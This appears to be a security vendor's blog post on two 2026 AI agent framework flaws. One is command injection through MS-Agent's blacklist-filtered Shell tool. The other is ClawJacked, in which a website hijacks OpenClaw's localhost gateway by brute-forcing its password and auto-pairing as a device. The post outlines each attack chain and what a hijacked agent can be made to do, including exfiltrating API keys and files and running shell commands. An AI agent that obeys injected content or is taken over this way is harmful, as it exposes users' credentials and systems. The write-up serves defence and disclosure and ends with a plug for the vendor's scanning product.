Two AI Framework Vulnerabilities This Week. Both Gave Attackers Full System Control.

In the same week that Google patched CVE-2026-0628 in Chrome’s Gemini panel, two separate research disclosures landed that together make a stark case about the state of AI agent security in early 2026. Both involved widely-used AI agent frameworks. Both gave attackers the ability to execute arbitrary commands on the host system. Both were exploited through fundamentally the same underlying mechanism — a language model that cannot distinguish between legitimate instructions and adversarially injected ones.

The frameworks are MS-Agent and OpenClaw. The vulnerabilities are CVE-2026-2256 and CVE-2026-25253, respectively. If your engineering organization uses either framework — or any AI agent framework with system-level access — these disclosures have direct implications for your security posture.

CVE-2026-2256: MS-Agent’s Shell Tool as an Attack Vector

MS-Agent is an open-source framework from ModelScope for creating AI agents capable of generating code, analyzing data, and interacting with system tools. It is based on MCP (Model Calling Protocol) and gives agents a Shell tool — the ability to execute OS commands on the host system as part of their normal operation.

The vulnerability, tracked as CVE-2026-2256 with a CVSS score of 9.8, was discovered by security researcher Itamar Yochpaz and disclosed via CERT/CC advisory VU#431821. The root cause is straightforward: MS-Agent’s Shell tool does not properly sanitize input before passing it to the OS for execution. The tool does implement a check function — six validation layers, in fact — but those layers use a regex-based blacklist pattern to filter dangerous commands. This is a known unsafe pattern. Blacklist-based filtering can be bypassed by command obfuscation, alternative syntax, encoding variations, or any input structure that the blacklist did not anticipate.

The result is that an attacker who can influence what content the MS-Agent processes — through a crafted document, malicious code in the agent’s context, a manipulated data source — can inject commands that survive all six validation layers and execute on the host with the full privileges of the MS-Agent process. Successful exploitation enables the attacker to read API keys, tokens, and configuration files; drop payloads on the host; modify the workspace state; establish persistence; pivot to internal services and adjacent systems; and inject input into build outputs, reports, or files that are consumed downstream.

At the time of SecurityWeek’s disclosure report, the vendor had not responded during CERT/CC coordination efforts. There is no official patch. Organizations using MS-Agent are currently operating with an unpatched CVSS 9.8 vulnerability.

CVE-2026-25253: ClawJacked — Any Website as an Attack Vector

OpenClaw is a self-hosted AI agent that has become the fastest-growing open-source project in GitHub’s history, reaching over 100,000 stars in less than a week after its launch. It runs locally on developer machines, integrates with messaging apps, calendars, and developer tools, and takes autonomous actions on the user’s behalf — sending emails, executing shell commands, reading files, managing workflows.

The ClawJacked vulnerability, discovered by Oasis Security and disclosed on February 26, 2026, is architecturally different from the MS-Agent flaw but equally severe. It does not require prompt injection or malicious content in the agent’s data pipeline. It requires only that the developer, running OpenClaw in the background, visits any attacker-controlled website in their browser.

OpenClaw’s gateway is a local WebSocket server that binds to localhost and acts as the central orchestration layer for the agent. The gateway assumes that connections originating from localhost are inherently trusted — a reasonable assumption in a world where only local applications can reach localhost. But browsers do not block cross-origin WebSocket connections to loopback addresses. JavaScript running on any website can silently open a WebSocket connection to a locally-running service without triggering any browser warning or user prompt.

The attack chain was a cascade of three flawed design assumptions. First, the gateway trusted localhost connections implicitly. Second, the rate limiter completely exempted loopback connections — failed authentication attempts were not counted, throttled, or logged. Third, the gateway automatically approved device pairings from localhost without requiring user confirmation. The consequence: a malicious website’s JavaScript could silently open a connection, brute-force the gateway password at hundreds of attempts per second (a common password list is exhausted in under a second at that rate), register as a trusted device without any user prompt, and gain full admin-level control of the agent.

“In practice, this means an attacker could instruct the agent to search the developer’s Slack history for API keys, read private messages, exfiltrate files from connected devices, or execute arbitrary shell commands on any paired node,” Oasis Security wrote. “For a developer with typical OpenClaw integrations, this is equivalent to full workstation compromise, initiated from a browser tab.”

The OpenClaw team classified this as high severity and shipped a fix in version 2026.2.25 within 24 hours of disclosure — a response time that deserves recognition. But with OpenClaw’s massive adoption footprint, organizations should assume unpatched instances exist across developer fleets. This is a shadow AI problem as much as it is a patching problem.

The Common Thread: Agents with System Access, Insufficient Trust Boundaries

Reading CVE-2026-2256 and CVE-2026-25253 alongside CVE-2026-0628 from the same week, a pattern emerges that every organization deploying AI agents needs to internalize.

AI agents that take autonomous actions — executing shell commands, reading files, managing credentials, calling APIs — have a blast radius that scales with their capability. A language model that can only generate text has limited exposure when compromised. An agent that can execute arbitrary OS commands, exfiltrate files, read credentials, and pivot to adjacent systems has the blast radius of a privileged system account. The security requirements are correspondingly different.

The MS-Agent vulnerability is a classic injection flaw — the same category of vulnerability that SQL injection and command injection belong to — applied to the interface between a language model and a system shell. The input that reaches the shell is controlled, at least partially, by whoever can influence the agent’s context. Blacklist-based filtering on that input is insufficient. The fix is architectural: strict allowlists that permit only specific, pre-approved commands; sandboxing that limits what a compromised agent process can reach; least-privilege execution that bounds the damage of a successful injection.

The OpenClaw vulnerability is a trust boundary failure. The gateway trusted localhost, but localhost was reachable by untrusted content — any website in the developer’s browser. The fix is to not conflate the origin of a connection with the trustworthiness of its source. Local does not mean safe. Rate limiting needs to apply regardless of connection origin. Device pairings require explicit user confirmation, always.

Both failures are detectable before deployment with the right evaluation tools. Static analysis of AI integration code paths — specifically the interfaces between model outputs and system execution — surfaces command injection vectors and trust boundary failures before they reach production. Apta Sentry’s code scanning pipeline is built around exactly this analysis: identifying where model-controlled data reaches privileged system interfaces, and whether the sanitization and trust controls at that interface are robust against adversarial inputs.

The Shadow AI Dimension

There is a layer to the OpenClaw story that the technical vulnerability disclosure underplays. At the time of the ClawJacked disclosure, OpenClaw had already become the most starred project in GitHub history. It had been adopted by developers at organizations across every industry in a matter of weeks, often without IT or security team visibility.

For many organizations, OpenClaw installations represent a growing category of shadow AI: developer-adopted tools that operate outside IT’s visibility, often with broad access to local systems and credentials, and no centralized governance. The ClawJacked vulnerability could be present on developer machines that the organization’s security team does not know are running OpenClaw at all.

Out of 10,700 skills on ClawHub — OpenClaw’s community marketplace — researchers at Koi Security found that more than 820 were malicious, a sharp increase from 324 discovered just weeks prior. Trend Micro found threat actors using 39 malicious skills to distribute the Atomic macOS information stealer.

The governance implication is direct: AI agents need to be inventoried, governed, and monitored with the same rigor as any other privileged software on the network. That means knowing which AI agent frameworks are running on developer machines, what credentials and capabilities those agents have been granted, and whether those agents are being monitored for anomalous behavior.

References:

Apta Sentry Model Security — /products/model-security

CVE-2026-2256, CERT/CC VU#431821, disclosed March 2026

SecurityWeek, Vulnerability in MS-Agent AI Framework Can Allow Full System Compromise, March 2026

CVE-2026-25253, Oasis Security, ClawJacked: OpenClaw Vulnerability Enables Full Agent Takeover, February 26, 2026

SecurityWeek, OpenClaw Vulnerability Allowed Websites to Hijack AI Agents, March 2026

Dark Reading, Critical OpenClaw Vulnerability Exposes AI Agent Risks, March 2026

Apta Sentry Code Scanning — /products/code-scanning